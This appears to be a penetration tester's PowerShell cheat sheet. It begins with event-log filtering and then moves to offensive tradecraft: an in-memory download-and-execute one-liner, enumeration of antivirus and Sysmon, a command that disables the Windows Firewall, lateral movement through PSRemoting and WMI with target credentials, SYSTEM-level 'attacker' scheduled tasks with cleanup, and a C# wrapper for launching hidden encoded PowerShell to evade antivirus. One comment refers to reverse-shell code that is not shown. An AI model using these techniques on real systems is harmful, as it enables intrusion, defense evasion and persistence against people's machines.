The algorithm can be excluded (in which case SHA-256 is used). Lots of different hashing algorithms are supported — run help Get-FileHash to see a list.
# Download to disk#Invoke-WebRequest -Uri $URL_OF_FILE -OutFile $FILE_ON_DISK# Download into a variable (useful for scripts!)#$SCRIPT_DATA = ` (New-Object System.Net.Webclient).DownloadString("$SCRIPT_URL")# Download and invoke from memory#IEX (New-Object System.Net.Webclient).DownloadString("$SCRIPT_URL")
# Get help on Get-WinEvent (calls out to Microsoft).#Get-Help Get-WinEvent# Filter event log output using the Where-Object command. This# apparently pipes the entire output to the Where-Object# command, which then scans for the appropriate field. So a# bit inefficient for large logs.#Get-WinEvent -LogName Application | Where-Object { $_.ProviderName -Match 'WLMS'}# To match event IDs with Where-Object, use the slightly# different form `Where-Object Id -eq 100`, etc.# Use the -FilterHashtable flag. This causes the filtering to# be done during the call made by Get-WinEvent, and has a more# straight-forward syntax too. However, it only works when# called against the system event log; Where-Object needs to# be used when specifying an archived log via -Path.## Note that hashes can be specified with newlines instead of# semicolons as well, which can make scripts A LOT more# readable!#Get-WinEvent -FilterHashtable @{ LogName = 'Application'; ProviderName = 'WLMS'}# To display all information about an event, pipe the output# of Get-WinEvent to `Format-List -Property *`
FilterHashtable
Get-WinEvent FilterHashtable
There’s lots of good information about the various FilterHashtable keys in Microsoft’s documentation. Some important ones:
LogName (String)
ProviderName (String)
Path (String)
Keywords (Long)
ID (Int32)
Level (Int32)
StartTime (DateTime)
EndTime (DateTime)
UserID (SID)
Data (String)
[NamedData] (String)
Wildcards can be used with LogName and ProviderName, but not with other keys.
Event Viewer displays most of these values in the “General” when viewing an individual log entry, though note that Keywords is translated to a string.
LogonType 9 represents a logon where the outbound credentials are different than the credentials used to authenticate to the account that is initiating that login (only logged by the host initiating the connection, however)
It’s hard to find documentation about event ID, and the meaning seems to shift between versions of Windows.
There are a lot of PowerShell commands that can be used for enumerating Windows.
# List all AD users (IFF the machine is joined to a domain!)#Get-ADUser -Filter *# List AD users within a particular LDAP subtree#Get-ADUser -Filter * -SearchBase "CN=Users,DC=example,DC=com"# Enumerate antivirus#Get-CimInstance -Namespace root/SecurityCenter2 ` -ClassName AntivirusProduct# Check if the Windows Defender service is running#Get-Service WinDefend# Check if real-time protection is enabled for Windows# Defender#Get-MpComputerStatus | select RealTimeProtectionEnabled# Get information about potential threats recently detected by# Windows Defender#Get-MpThreat# Check the status of the Windows Firewall#Get-NetFirewallProfile | Format-Table Name,Enabled# Disable all WIndows Firewall profiles#Set-NetFirewallProfile -Profile Domain,Public,Private ` -Enabled False# List Windows Firewall rules#Get-NetFirewallRule | select DisplayName,Enabled,Description# Two ways to check if a port can be connected to (the first# provides more output, while the second is more suitable for# scripting)#Test-NetConnection -ComputerName $IP_OR_HOSTNAME -Port $PORT(New-Object System.Net.Sockets.TcpClient("$IP_OR_HOSTNAME", "$PORT")).Connected# List all current Windows logs#Get-EventLog -List# Sysmon is dangerous for an attacker! Three ways to check if# it's running...#Get-Process | Where-Object { $_.ProcessName -eq "Sysmon" }Get-CimInstance win32_service ` -Filter "Description = 'System Monitor service'"Get-Service | where-object {$_.DisplayName -like "sysm"}# List hidden directories#Get-ChildItem -Hidden -Path $SOME_PATH# Get a process with a particular "image name" (generally example.exe has an image name of "example")#Get-Process -Name $IMAGE_NAME
When checking to see if Sysmon is running, you can also examine the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon\Operational Registry entry.
Windows Defender uses a process called AMSI that triggers when a script is run in PowerShell (this includes invocations of IEX for in-memory scripts!).
Many large companies will enable PowerShell remoting on all machines in order to ease IT support burdens (by default, remoting is only enabled on domain controllers).
# Create PSCredential object for authentication.#$username = "$TARGET_USER";$password = "$TARGET_PASSWORD";$SECURE_PASSWORD = ConvertTo-SecureString "$TARGET_PASSWORD" ` -AsPlainText -Force;$CREDENTIAL_OBJECT = New-Object ` System.Management.Automation.PSCredential ` $TARGET_USER, $SECURE_PASSWORD;# Enter an interactive PowerShell session on the $TARGET_HOST.#Enter-PSSession -ComputerName $TARGET_HOST ` -Credential $CREDENTIAL_OBJECT# Alternately, we can pass commands directly as "script# blocks". Note that the $POWERSHELL_SCRIPT does not have# access to any variables in the host script or session, as# its sent to $TARGET_HOST for execution (though this can be# worked around using the -ArgumentList parameter, if# necessary).#Invoke-Command -ComputerName $TARGET_HOST ` -Credential $CREDENTIAL_OBJECT ` -ScriptBlock { $POWERSHELL_SCRIPT }
The below blocks demonstrate using WMI to spawn processes and create malicious services and tasks using powershell.
Prerequisites
How to set up WMI in PowerShell
# Create PSCredential object for authentication.#$SECURE_PASSWORD = ConvertTo-SecureString "$TARGET_PASSWORD" ` -AsPlainText -Force;$CREDENTIAL_OBJECT = ` New-Object System.Management.Automation.PSCredential ` $TARGET_USER, $SECURE_PASSWORD;# Start a new WMI session and store the connection information# as $session. The protocol used can be either DCOM (RPC using# TCP 135, as with sc.exe and schtasks.exe) or WSMAN (WinRM# over TCP 5985 or TCP 5986, depending on whether HTTPS is# supported by $TARGET_HOST).#$OPTIONS_OBJECT = New-CimSessionOption -Protocol DCOM$SESSION_OBJECT = New-Cimsession ` -ComputerName $TARGET_HOST ` -Credential $CREDENTIAL_OBJECT ` -SessionOption $OPTIONS_OBJECT ` -ErrorAction Stop
How to work with remote tasks using WMI and PowerShell
# Create $ATTACKER_TASK using the WMI session established in# $SESSION_OBJECT. Note that $SOME_COMMAND must be broken up# here into the binary path and the command arguments.#$TASK_OBJECT = New-ScheduledTaskAction ` -CimSession $SESSION_OBJECT ` -Execute "$SOME_BINARY_PATH" ` -Argument "$SOME_COMMAND_ARGUMENTS"Register-ScheduledTask -CimSession $SESSION_OBJECT ` -Action $TASK_OBJECT ` -User "NT AUTHORITY\SYSTEM" ` -TaskName "$ATTACKER_TASK"# Invoke $ATTACKER_TASK.#Start-ScheduledTask -CimSession $SESSION_OBJECT ` -TaskName "$ATTACKER_TASK"# Clean up after yourself.#Unregister-ScheduledTask -CimSession $SESSION_OBJECT ` -TaskName "$ATTACKER_TASK"
Note that <IP> and <PORT> need to be appropriately replaced in the above code.
One annoying thing about this reverse shell… There’s no initial prompt, so you have no idea whether you’ve connected or not. but as soon as you enter a command (whoami, etc.), a prompt will appear after the output. On the plus side, however, this reverse shell will persist even after the PHP script times out!
Powercat is a PowerShell-native re-implementation of netcat. Powercat can be installed on Kali Linux using sudo apt install powercat; the script can be found at /usr/share/windows-resources/powercat/powercat.ps1.
C# can be used to bypass AV (at least as of September 2022) — just create a C# wrapper that fires up a PowerShell one-liner. (Sometimes this will need to be modified slightly to bypass AV, but generally you don’t have to tweak this code much — C# analysis doesn’t seem to be particularly robust for most AV products.)
using System;namespace Game{ public class Program { public static void Main() { System.Diagnostics.Process P = new System.Diagnostics.Process(); System.Diagnostics.ProcessStartInfo SI = new System.Diagnostics.ProcessStartInfo(); SI.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden; SI.FileName = "powershell.exe"; SI.Arguments = "-enc $BASE64_ENCODED_SCRIPT_TO_RUN"; P.StartInfo = SI; P.Start(); } }}
This can be compiled using PowerShell — perhaps even on the target itself. What’s the advantage to doing this? You can use Invoke-Mimikatz to run this binary remotely to quickly obtain a remote shell with the permissions of the user you’re impersonating.
$code = @"using System;namespace Game{ public class Program { public static void Main() { System.Diagnostics.Process P = new System.Diagnostics.Process(); System.Diagnostics.ProcessStartInfo SI = new System.Diagnostics.ProcessStartInfo(); SI.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden; SI.FileName = "powershell.exe"; SI.Arguments = "-enc $BASE64_ENCODED_SCRIPT_TO_RUN"; P.StartInfo = SI; P.Start(); } }}"@Add-Type -outputtype consoleapplication -outputassembly $BINARY_NAME -TypeDefinition $code -Language CSharp